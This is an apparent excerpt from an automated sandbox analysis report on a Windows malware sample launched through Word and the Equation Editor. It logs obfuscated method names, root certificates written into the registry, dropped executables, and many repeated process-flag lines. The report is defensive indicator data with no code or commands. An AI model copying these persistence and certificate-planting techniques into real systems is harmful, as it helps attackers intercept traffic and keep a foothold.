Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, JpIAI22TPeuUCKgw8d.cs High entropy of concatenated method names: 'QErjekxGsZ', 'FXhjWQyDmo', 'uQupuUm1v5', 'S0RpwsuMRZ', 'f3Bjm4OOhC', 'vQxjL8L1ZE', 'i1fjiirOpo', 'RWCjvWaHgx', 'wwmj0uFIeH', 'naOjhQR9xY'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, CLs2kbe5U6HxbH6rln.cs High entropy of concatenated method names: 'omJrZCkSS', 'jeVoNhX4p', 'xyoDYsKFj', 'UxdQO28Iw', 'uIpdCS53K', 'T9fVMTmhm', 'WBwQXkVKTkThYvZHLr', 'RFLe8WPpMjZEWFxkU2', 'FrkpCpO16', 'UhWkcY0Hl'
Source: 5.2.cmnjgwhesilo61000.exe.40a22f0.3.raw.unpack, Ur1wr2Gv8belLDObbn.cs High entropy of concatenated method names: 'wegFHqPAJM', 'XGlFSBl5yl', 'zqQFrTKaqr', 'YcLFo8ePl0', 'QhHFARDUvD', 'VCjFDpbGgb', 'wtbFQ0V1KY', 'RrfF9aT53D', 'UaGFdLNjZi', 'nsJFV0l2up'

Persistence and Installation Behavior
barindex
Installs new ROOT certificates
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pKL9HXcZosWfPt1[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Jump to dropped file
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Stores large binary data to the registry
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
